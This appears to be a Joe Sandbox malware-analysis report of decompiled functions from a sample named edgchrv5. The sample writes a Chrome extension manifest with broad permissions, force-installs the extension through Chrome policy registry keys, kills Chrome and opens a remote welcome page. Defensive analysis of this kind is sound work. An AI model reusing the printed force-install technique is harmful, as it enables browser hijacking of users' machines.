Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: db7c11ad30ea1ffeaa7bce15382c1b47a50a64aab214d61af40d1df0bc7bec56
Instruction ID: ff4226ce4195826263f1d35a14917f6efb8b946ef5a21afbf7d326a3c1f93727
Opcode Fuzzy Hash: db7c11ad30ea1ffeaa7bce15382c1b47a50a64aab214d61af40d1df0bc7bec56
Instruction Fuzzy Hash: 9B214AB5900209EBDF15DFE8C984AFEBBB4AF48710F008649F640A7281D775DA50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0100576B Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100576B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E010041A5(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E01009050(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x0100576e
0x01005774
0x0100577a
0x01005783
0x00000000
0x01005785
0x01005785
0x01005785
0x01005786
0x01005787
0x0100578d
0x0100578e
0x01005785
0x01005798
0x0100579c
0x010057a1
0x010057a6
0x010057b8
0x010057bd
0x010057a9
0x010057b4
0x0100577c
0x0100577f
0x0100577f

APIs

GetEnvironmentStringsW.KERNEL32(00000000,01003090), ref: 0100576E
__malloc_crt.LIBCMT ref: 0100579C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 010057A9

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 620c4ef5a85d5fd04f7af115a81030291add549a169ec899337ea2a80e9da517
Instruction ID: 203133b8cd5a7d3920334d2fd1534d06991215e2174f444a5e024ebc4c975d0e
Opcode Fuzzy Hash: 620c4ef5a85d5fd04f7af115a81030291add549a169ec899337ea2a80e9da517
Instruction Fuzzy Hash: 63F02777604021AEFB6376387C4C4BB16A8EAC7125B1244A5F4DAC31C1FE204C869AA1

Uniqueness

Uniqueness Score: -1.00%

Function 010029FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(0100C178,00008000,00000000,0101D264,0100287A), ref: 01002A46

Strings

jjj, xrefs: 01002A7A

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: FolderKnownPath
String ID: jjj
API String ID: 3622228125-2289343631
Opcode ID: 53438df88e5d9fa7f0a64d89b56ec208ba92dac44a7d1c7da4c66a26e44b8553
Instruction ID: faae31c0b7600cd2df4e7bdddb0ff8e3f3f37d893b14acc6766e7a595bab99c8
Opcode Fuzzy Hash: 53438df88e5d9fa7f0a64d89b56ec208ba92dac44a7d1c7da4c66a26e44b8553
Instruction Fuzzy Hash: CB11E921E8874557F5F776BE0C0DB6D2690AF67730F0C8ACAAAE2A52D3DD4094C48233

Uniqueness

Uniqueness Score: -1.00%

Function 01001563 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E01001563(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t33;
				void* _t52;
				void* _t53;
				intOrPtr _t61;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t75;
				void* _t76;

				_t75 = __eflags;
				_t67 = __esi;
				_t66 = __edi;
				_t53 = __ecx;
				_t52 = __ebx;
				 *((intOrPtr*)(__ecx - 1))();
				asm("adc eax, 0x100c00c");
				if(__eflags > 0 && __eflags <= 0) {
					0x27f18f2();
				}
				if(_t75 > 0 && _t75 <= 0) {
					0xd3642b04();
				}
				_t61 =  *0x101d264; // 0x145f9e0
				E01002B10(_t53, _t68 - 0x210, L"%s\\ServiceApp\\apps-helper\\service.js", _t61);
				asm("clc");
				if(_t75 < 0) {
					0x69008080();
				}
				_t33 = CreateFileW(_t68 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				 *(_t68 - 0x218) = _t33;
				if(_t75 != 0 && _t75 == 0) {
				}
				_t76 =  *(_t68 - 0x218) - 0xffffffff;
				_push( *((intOrPtr*)(_t68 + _t66 + 0x7e)));
			}

0x01001563
0x01001563
0x01001563
0x01001563
0x01001563
0x01001563
0x01001566
0x0100156b
0x0100156f
0x0100156f
0x01001570
0x01001574
0x01001574
0x01001575
0x01001588
0x01001590
0x01001591
0x01001593
0x01001593
0x010015ae
0x010015b4
0x010015ba
0x010015ba
0x010015bf
0x010015c5

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 010015AE

Strings

%s\ServiceApp\apps-helper\service.js, xrefs: 0100157C

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateFile
String ID: %s\ServiceApp\apps-helper\service.js
API String ID: 823142352-2282167902
Opcode ID: b69e72d2e4c717e53763f778a80d3932ab47c87dd49e99bd669871e44b7d575f
Instruction ID: 131e2785e977299e084374023837d5109fbf381d9f6cd3a81539e54a32aae03f
Opcode Fuzzy Hash: b69e72d2e4c717e53763f778a80d3932ab47c87dd49e99bd669871e44b7d575f
Instruction Fuzzy Hash: 2DF089B5C48244DAF7639B746C497F876646B21339F0D07C9B5A1590C2EB7685848A11

Uniqueness

Uniqueness Score: -1.00%

Function 010015FD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E010015FD(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				void* _t37;
				intOrPtr _t38;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t55;
				void* _t56;

				_t55 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t37 = __ebx;
				 *((intOrPtr*)(__eax - 1))();
				asm("adc eax, 0x100c00c");
				if(__eflags != 0 && __eflags == 0) {
					0xd3642399();
				}
				_t38 =  *0x101d264; // 0x145f9e0
				E01002B10(_t38, _t49 - 0x210, L"%s\\ServiceApp\\apps-helper\\web.js", _t38);
				if(_t55 > 0 && _t55 <= 0) {
					0x81681698();
				}
				_t25 = CreateFileW(_t49 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				 *(_t49 - 0x21c) = _t25;
				asm("clc");
				if(_t55 < 0) {
					0xe5bd9a3f();
				}
				_t56 =  *(_t49 - 0x21c) - 0xffffffff;
				_push( *((intOrPtr*)(_t49 + _t47 + 0x74)));
			}

0x010015fd
0x010015fd
0x010015fd
0x010015fd
0x010015fd
0x01001600
0x01001605
0x01001609
0x01001609
0x0100160a
0x0100161d
0x01001625
0x01001629
0x01001629
0x01001643
0x01001649
0x0100164f
0x01001650
0x01001652
0x01001652
0x01001654
0x0100165a

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,01001404), ref: 01001643

Strings

%s\ServiceApp\apps-helper\web.js, xrefs: 01001611

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateFile
String ID: %s\ServiceApp\apps-helper\web.js
API String ID: 823142352-2674398451
Opcode ID: f7f364c110fefce1f14957ae19538bef80fdb712b766328900f94521b652d2db
Instruction ID: 9eb5937e66f7f6c7380c3123c5bd1ee4738d9e3be3f2a47f854dd927bf75fc63
Opcode Fuzzy Hash: f7f364c110fefce1f14957ae19538bef80fdb712b766328900f94521b652d2db
Instruction Fuzzy Hash: 06F082B18507045BF7639BB89C0DBA97774AB29335F0C0BC4E1B0960E1F6B585848B11

Uniqueness

Uniqueness Score: -1.00%

Function 010014CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E010014CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				void* _t40;
				void* _t43;
				void* _t66;
				intOrPtr _t77;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t92;
				void* _t93;
				void* _t94;

				_t92 = __eflags;
				_t83 = __esi;
				_t82 = __edi;
				_t66 = __ebx;
				 *((intOrPtr*)(__edx - 1))();
				asm("adc eax, 0x101d284"); // executed
				if(__eflags != 0 && __eflags == 0) {
					0x2d2797f();
				}
				_t38 =  *0x101d264; // 0x145f9e0
				_t67 = _t84 - 0x210;
				E01002B10(_t84 - 0x210, _t84 - 0x210, L"%s\\ServiceApp\\apps-helper\\manifest.json", _t38);
				if(_t92 != 0 && _t92 == 0) {
					0x80();
				}
				_t40 = CreateFileW(_t84 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				 *(_t84 - 0x214) = _t40;
				if(_t92 != 0 && _t92 == 0) {
					0xfeecd2ab();
				}
				_t93 =  *(_t84 - 0x214) - 0xffffffff;
				if(_t93 != 0) {
					if(_t93 != 0 && _t93 == 0) {
						0x6800();
					}
					WriteFile( *(_t84 - 0x214), E01001000(_t67, "{\r\n\t\"name\": \"Apps\",\r\n\t\"description\": \"\",\r\n\t\"version\": \"1.0\",\r\n\t\"manifest_version\": 3,\r\n\t\"background\": {\r\n\t\t\"service_worker\": \"service.js\",\r\n\t\t\"type\": \"module\"\r\n\t},\r\n\t\"permissions\": [\"tabs\", \"scripting\", \"management\", \"background\"],\r\n\t\"host_permissions\": [\"chrome://*/*\"]\r\n}", 0x111), 0x111, 0, 0); // executed
					if(_t93 > 0 && _t93 <= 0) {
						0xfeeca2ed();
					}
					_t67 =  *(_t84 - 0x214);
					 *((intOrPtr*)(_t67 - 1))();
					asm("adc eax, 0x100c00c");
					if(_t93 > 0 && _t93 <= 0) {
						0x27f18f2();
					}
				}
				if(_t93 > 0 && _t93 <= 0) {
					0xd3642b04();
				}
				_t77 =  *0x101d264; // 0x145f9e0
				E01002B10(_t67, _t84 - 0x210, L"%s\\ServiceApp\\apps-helper\\service.js", _t77);
				asm("clc");
				if(_t93 < 0) {
					0x69008080();
				}
				_t43 = CreateFileW(_t84 - 0x210, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				 *(_t84 - 0x218) = _t43;
				if(_t93 != 0 && _t93 == 0) {
				}
				_t94 =  *(_t84 - 0x218) - 0xffffffff;
				_push( *((intOrPtr*)(_t84 + _t82 + 0x7e)));
			}

0x010014cd
0x010014cd
0x010014cd
0x010014cd
0x010014cd
0x010014d0
0x010014d5
0x010014d9
0x010014d9
0x010014da
0x010014e5
0x010014ec
0x010014f4
0x010014f8
0x010014f8
0x01001513
0x01001519
0x0100151f
0x01001523
0x01001523
0x01001524
0x0100152b
0x0100152d
0x01001531
0x01001531
0x01001553
0x01001559
0x0100155d
0x0100155d
0x0100155e
0x01001563
0x01001566
0x0100156b
0x0100156f
0x0100156f
0x0100156b
0x01001570
0x01001574
0x01001574
0x01001575
0x01001588
0x01001590
0x01001591
0x01001593
0x01001593
0x010015ae
0x010015b4
0x010015ba
0x010015ba
0x010015bf
0x010015c5

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01001513

Strings

%s\ServiceApp\apps-helper\manifest.json, xrefs: 010014E1

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateFile
String ID: %s\ServiceApp\apps-helper\manifest.json
API String ID: 823142352-3265209009
Opcode ID: ec6c50c01c5205f74468504e76ce13bfea713b4600fe20f71099d0b4f75dd46f
Instruction ID: e39dc5a75ec5f006db869e802b6c6e045e256dde1d6840492df4ab1032c2b8c9
Opcode Fuzzy Hash: ec6c50c01c5205f74468504e76ce13bfea713b4600fe20f71099d0b4f75dd46f
Instruction Fuzzy Hash: F1F027B18443044BFBB3676C9C0C7E87AB0AF62320F0906C8D2A55A1E2D976C581CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0100186A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist,00000000,000F003F,?), ref: 01001894

Strings

SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
API String ID: 71445658-1523167323
Opcode ID: 27289d2de0ca391132d20bbd9fe90387cf9f1b59ebcf847c6357d3fdb157ed5e
Instruction ID: 0059e948da7fa33808132173c862c63401cb0f19284bee29b826086abb1cd95f
Opcode Fuzzy Hash: 27289d2de0ca391132d20bbd9fe90387cf9f1b59ebcf847c6357d3fdb157ed5e
Instruction Fuzzy Hash: 62D0C27094021497FB320AA08C0D7BCB624AB24B20F50078CE7A5550D2DA74C3808711

Uniqueness

Uniqueness Score: -1.00%

Function 01001953 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
registryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E01001953(void* __eax, signed char __ebx, void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr __esi) {
				long _t258;
				long _t260;
				void* _t264;
				intOrPtr _t265;
				long _t267;
				void* _t268;
				int _t269;
				intOrPtr _t270;
				void* _t280;
				signed int _t284;
				short _t287;
				signed int _t292;
				short _t294;
				long _t301;
				void* _t302;
				intOrPtr _t326;
				short _t355;
				short _t358;
				void* _t365;
				void* _t384;
				signed char _t390;
				void* _t392;
				void* _t400;
				void* _t401;
				intOrPtr _t405;
				void* _t406;
				void* _t414;
				void* _t447;
				intOrPtr _t448;
				void* _t455;
				signed int _t457;
				void* _t458;
				void* _t459;
				WCHAR* _t461;
				void* _t478;
				intOrPtr* _t494;
				intOrPtr _t495;
				signed int _t497;
				void* _t500;
				void* _t501;
				void* _t502;
				void* _t503;
				void* _t504;
				void* _t506;
				void* _t508;
				void _t512;
				long _t513;
				long _t514;
				void* _t515;
				short _t517;
				void* _t518;
				int _t522;

				_t495 = __esi;
				_t494 = __edi;
				_t447 = __edx;
				_t390 = __ebx;
				 *((intOrPtr*)(__eax + 0x68))();
				asm("aas");
				 *__edi =  *__edi + __ecx;
				 *__edx =  *__edx + __ecx;
				_t512 =  *__edx;
				_t258 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", ??, ??, ??); // executed
				 *(_t497 - 0x3540) = _t258;
				if(_t512 != 0 && _t512 == 0) {
					0xffca();
				}
				_t513 =  *(_t497 - 0x3540);
				if(_t513 == 0) {
					if(_t513 != 0 && _t513 == 0) {
					}
					RegDeleteValueW( *(_t497 - 0x214), L"path");
					if(_t513 != 0 && _t513 == 0) {
					}
					_t447 =  *(_t497 - 0x214);
					RegDeleteValueW(_t447, L"version");
					if(_t513 != 0 && _t513 == 0) {
						0xfffd();
					}
					RegCloseKey( *(_t497 - 0x214));
					if(_t513 != 0 && _t513 == 0) {
						0x2751d3f();
					}
				}
				if(_t513 != 0 && _t513 == 0) {
				}
				_t392 = _t497 - 0x214;
				 *((intOrPtr*)(_t392 + 0x68))();
				asm("aas");
				 *_t494 =  *_t494 + _t392;
				 *_t447 =  *_t447 + _t392;
				_t260 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions", ??, ??, ??); // executed
				 *(_t497 - 0x3540) = _t260;
				_t514 =  *(_t497 - 0x3540);
				if(_t514 == 0) {
					asm("clc");
					if(_t514 < 0) {
						0xf99082e9();
					}
					RegDeleteKeyW( *(_t497 - 0x214), L"ecffbknobglofafinobbcmaionnihcma");
					asm("clc");
					if(_t514 < 0) {
						0xed85a600();
					}
					_t384 =  *(_t497 - 0x214);
					 *((intOrPtr*)(_t384 - 1))();
					asm("adc eax, 0x101d274");
					asm("clc");
					if(_t514 < 0) {
						0x80039912();
					}
				}
				if(_t514 > 0 && _t514 <= 0) {
					0x16a1f9a();
				}
				_t393 = _t497 - 0x420;
				ShellExecuteW(0, L"open", _t497 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
				asm("clc");
				if(_t514 < 0) {
					0x1c588339();
				}
				Sleep(0x1b58); // executed
				if(_t514 != 0 && _t514 == 0) {
				}
				_t448 =  *0x101d264; // 0x145f9e0
				E01002B10(_t393, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t448);
				_t501 = _t500 + 0xc;
				if(_t514 != 0 && _t514 == 0) {
				}
				_t264 = FindFirstFileW(_t497 - 0x210, _t497 - 0xa88); // executed
				 *(_t497 - 0x332c) = _t264;
				if(_t514 != 0 && _t514 == 0) {
				}
				 *(_t497 - 0x353c) = 0;
				_t265 =  *0x101d264; // 0x145f9e0
				_t395 = _t497 - 0x210;
				E01002B10(_t497 - 0x210, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t265);
				_t502 = _t501 + 0xc;
				_t267 = GetFileAttributesW(_t497 - 0x210); // executed
				_t515 = _t267 - 0xffffffff;
				if(_t515 == 0) {
					if(_t515 != 0 && _t515 == 0) {
						0xffc8();
					}
					 *((intOrPtr*)(_t497 - 0x3764)) = L"Default";
					 *(_t497 - 0x3768) = _t497 +  *(_t497 - 0x353c) * 0x208 - 0x3328;
					 *(_t497 - 0x376c) =  *(_t497 - 0x3768);
					 *(_t497 - 0x353c) =  *(_t497 - 0x353c) + 1;
					 *(_t497 - 0x3770) =  *(_t497 - 0x376c);
					do {
						 *((short*)(_t497 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3764))));
						 *( *(_t497 - 0x376c)) =  *((intOrPtr*)(_t497 - 0x3772));
						 *((intOrPtr*)(_t497 - 0x3764)) =  *((intOrPtr*)(_t497 - 0x3764)) + 2;
						_t395 =  &( *(_t497 - 0x376c)->dwFileAttributes);
						 *(_t497 - 0x376c) =  &( *(_t497 - 0x376c)->dwFileAttributes);
						_t517 =  *((short*)(_t497 - 0x3772));
					} while (_t517 != 0);
					if(_t517 != 0 && _t517 == 0) {
						0x9a02();
					}
				}
				if(_t517 != 0 && _t517 == 0) {
					0xe801();
				}
				do {
					if(_t517 != 0 && _t517 == 0) {
						0x1fa2bec();
					}
					_t268 = E01002B60(_t497 - 0xa5c, L"Profile ");
					_t502 = _t502 + 8;
					_t518 = _t268;
					if(_t518 != 0) {
						asm("clc");
						if(_t518 < 0) {
							0xa585a98c();
						}
						_t365 = _t497 - 0xa5c;
						 *((intOrPtr*)(_t365 - 0x75))();
						E01002B10(_t395, _t497 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t395);
						_t502 = _t502 + 0x10;
						if(GetFileAttributesW(_t497 - 0x210) == 0xffffffff) {
							 *((intOrPtr*)(_t497 - 0x3778)) = _t497 - 0xa5c;
							 *((intOrPtr*)(_t497 - 0x377c)) = _t497 +  *(_t497 - 0x353c) * 0x208 - 0x3328;
							 *((intOrPtr*)(_t497 - 0x3780)) =  *((intOrPtr*)(_t497 - 0x377c));
							 *(_t497 - 0x353c) =  *(_t497 - 0x353c) + 1;
							 *((intOrPtr*)(_t497 - 0x3784)) =  *((intOrPtr*)(_t497 - 0x3780));
							do {
								 *((short*)(_t497 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3778))));
								 *((short*)( *((intOrPtr*)(_t497 - 0x3780)))) =  *((intOrPtr*)(_t497 - 0x3786));
								 *((intOrPtr*)(_t497 - 0x3778)) =  *((intOrPtr*)(_t497 - 0x3778)) + 2;
								 *((intOrPtr*)(_t497 - 0x3780)) =  *((intOrPtr*)(_t497 - 0x3780)) + 2;
							} while ( *((short*)(_t497 - 0x3786)) != 0);
						}
					}
					_t395 = _t497 - 0xa88;
					_t452 =  *(_t497 - 0x332c);
					_t269 = FindNextFileW( *(_t497 - 0x332c), _t497 - 0xa88); // executed
					_t522 = _t269;
				} while (_t522 != 0);
				if(_t522 != 0 && _t522 == 0) {
					0xffca();
				}
				if( *(_t497 - 0x353c) != 0) {
					if(__eflags > 0 && __eflags <= 0) {
						0x2d28149();
					}
					_t270 =  *0x101d264; // 0x145f9e0
					_t400 = _t497 - 0x3538;
					E01002B10(_t400, _t400, L"%s\\ServiceApp\\apps-helper", _t270);
					_t503 = _t502 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xc995aaae();
					}
					E01002B10(_t400, _t497 - 0x3748, L"%s\\edge.crx", _t497 - 0x3538);
					_t504 = _t503 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xfc8085ce();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L81;
						__eflags = _t400 + _t497;
					}
					_t401 = _t497 - 0x3748;
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t401); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb995ab2b();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t497 - 0x3748); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xdd85ab6a();
					}
					_t280 = E01001330(_t390, _t495, L" /IM chrome.exe", _t497 - 0x424); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L95;
						__eflags = _t280 + _t497;
					}
					Sleep(0x2bc); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb585e590();
					}
					 *(_t497 - 0x374c) = 0;
					while(1) {
						_t455 =  *(_t497 - 0x374c);
						__eflags = _t455 -  *(_t497 - 0x353c);
						if(__eflags >= 0) {
							break;
						}
						if (__eflags == 0) goto L104;
						__eflags = _t495 +  *((intOrPtr*)(_t497 + 1));
					}
					if(__eflags > 0 && __eflags <= 0) {
						0xc9b0a3fd();
					}
					 *(_t497 - 0x3750) = 0;
					__eflags =  *(_t497 - 0x3750) -  *(_t497 - 0x353c);
					if(__eflags >= 0) {
						Sleep(0x1388); // executed
						if(__eflags != 0 && __eflags == 0) {
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						asm("clc");
						if(__eflags < 0) {
							0x27887eb();
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						Sleep(0x1388); // executed
						_t452 = _t497 - 0x424;
						E01001330(_t390, _t495, L" /F /IM chrome.exe /T", _t497 - 0x424); // executed
						if(__eflags != 0 && __eflags == 0) {
							0xfc4d();
						}
						_t284 = 0;
						__eflags = 0;
						goto L133;
					} else {
						if(__eflags != 0 && __eflags == 0) {
							0xc9b0b3ef();
						}
						_t457 =  *(_t497 - 0x3750) * 0x208;
						__eflags = _t457;
						_push(_t497 + _t457 - 0x3328);
						_t405 =  *0x101d264; // 0x145f9e0
						_t458 = _t497 - 0x630;
						_t287 = E01002B10(_t405, _t458, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t405);
						_t506 = _t504 + 0x10;
						if(__eflags != 0 && __eflags == 0) {
						}
						while(1) {
							_t390 = _t390 >> 0xff;
							_t114 = _t405 + 2; // 0x2e0000
							__eflags = _t287 - 1 -  *_t114;
							if(_t287 - 1 !=  *_t114) {
								goto L143;
							}
							 *(_t497 - 0x3fbc) =  *(_t497 - 0x3fbc) + 4;
							 *((intOrPtr*)(_t497 - 0x3fb8)) =  *((intOrPtr*)(_t497 - 0x3fb8)) + 4;
							__eflags =  *((short*)(_t497 - 0x3fc0));
							if( *((short*)(_t497 - 0x3fc0)) != 0) {
								L137:
								_t458 =  *(_t497 - 0x3fbc);
								_t294 =  *_t458;
								 *((short*)(_t497 - 0x3fbe)) = _t294;
								__eflags = _t294 -  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fb8))));
								if(_t294 !=  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fb8))))) {
									goto L143;
								} else {
									__eflags =  *((short*)(_t497 - 0x3fbe));
									if( *((short*)(_t497 - 0x3fbe)) == 0) {
										goto L142;
									} else {
										_t458 =  *(_t497 - 0x3fbc);
										_t287 =  *((intOrPtr*)(_t458 + 2));
										 *((short*)(_t497 - 0x3fc0)) = _t287;
										_t405 =  *((intOrPtr*)(_t497 - 0x3fb8));
										continue;
									}
								}
							} else {
								L142:
								 *(_t497 - 0x3fc4) = 0;
							}
							L144:
							 *(_t497 - 0x3fc8) =  *(_t497 - 0x3fc4);
							__eflags =  *(_t497 - 0x3fc8);
